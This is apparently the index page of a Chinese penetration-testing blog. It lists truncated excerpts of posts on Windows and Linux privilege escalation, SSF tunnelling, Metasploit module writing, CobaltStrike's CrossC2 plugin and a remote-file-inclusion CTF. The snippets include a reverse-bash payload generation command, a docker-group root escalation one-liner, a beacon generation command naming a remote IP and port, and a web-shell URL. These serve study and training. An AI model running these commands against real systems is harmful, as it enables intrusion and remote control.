windows提权导航页 windows内核漏洞windows内核漏洞提权教程windows内核提权 windows服务 DLLHijack 无引号服务路径提权 windows本地提权之命名管道 服务提权之注册表提权 windows服务漏洞之可执行文件 windows服务漏洞之binpath提权 密码挖掘提权(跳过)注册表 autorun 总是以管理员权限安装的提权 计划任务计划任务的提权 UAC bypass待更新 2021-01-03 windows windows
ssf隧道 引子当你凝视深渊的时候,深渊也在凝视着你。 环境 ssf隧道录制的视频: SSF反向端口转发&动态转发 多层内网隧道-SSF正向端口转发 socket 套接字是什么 带着问题去思考,何为正向,何为反向正向端口转发步骤一: 服务端执行: upx-ssfd.exe -p 1080 服务端开启1080端口,进行监听 客户端执行: ssf -D 9000 -p 1080 172.20.1 2021-01-03 tools tools
一期纯粹的软件推荐文章 文件相关文本编辑 https://notepad-plus-plus.org/downloads/ markdown文档编辑器 https://hemashushu.github.io/yu-writer.site/优点是界面设计优秀,好看好用 https://typora.io/ https://github.com/jgm/pandoc优点是插件多:支持markdown转docx格式 2021-01-02 tools tools
01-msf的exp模块 分为4个部分 class 定义类,导入的msf的类,叫mixins include 导入函数库 初始化,定义参数,模块的值 定义要执行的exp 如果语法写错了,可以在日志里看: /root/.msf4/logs/framework.log 写的demo,作用是调用tcp模块,进行ftp连接12345678910111213141516171819202122232425262728 2020-12-27 metasploit metasploit
02-建立一个新的session msf 建立一个新的sessionnew_session.rb作用是建立一个新的meterpreter session 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747 2020-12-26 metasploit metasploit
03-msf报错(SESSION may not be compatible) 起因:sudo -s提权在msf上一直报错,但是在靶机上是可以成功提权的。msf有一个模块,叫做post/multi/manage/sudo 看过这个模块的源码,就是使用sudo -s来提权的。 为什么会提权失败呢? 环境配置复现,debug设置msf监听handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash 生成反弹shell的载荷 2020-12-22 metasploit metasploit
linux提权-msf提权插件编写中 linux提权-msf提权插件编写中 bob / secret docker组提权1docker run -v /:/linsecurity -i -t chrisfosterelli/rootplease nsf提权12345678910111213141516171819202122232425查看并挂载目录showmount -e 192.168.1.140mount 192.168.1.1 2020-12-19 linux linux
cobaltstrike的脚本(四) linux上线插件CrossC2录制的视频: CobaltStrike的插件 1234567891. src目录下,修改cna$CC2_PATH$CC2_BIN2. 添加证书.cobaltstrike.beacon_keys3. ./genCrossC2.Linux 18.163.137.185 6677 /root/tool/cobaltstrike/CrossC2-master/.cobalt 2020-12-12 cobaltstrike cobaltstrike
2021年学习计划 引子业精于勤荒于嬉,行成于思毁于随 开篇还有不到一个月,就要进入2021年了。废话不多说。总结一下去年计划完成情况,以及列一下2021年的学习计划。 2020年年度复盘2020年的上半年我是很闲的。众所周知的黑天鹅事件——一场温柔又致命的virus袭击了全球。在死亡人数到达百万之众的情况下,我还留着一条小命。不知道该不该感到庆幸。 总之还活着呢,最近几年也还要活下去。 2020计划考oscp,因为 2020-12-11 experience experience
Warchall Live RFI 远程文件包含 题目地址 访问http://rfi.warchall.net/。 web目录fuzz,以及index.php查看源码 远程命令执行漏洞查看文件123456789http://rfi.warchall.net/temp/payload.php?cmd=lsconf.txtindex.php.baklive_rfi.config.php.bakpayload.phpsol.php~sol.txtsol 2020-12-05 CTF CTF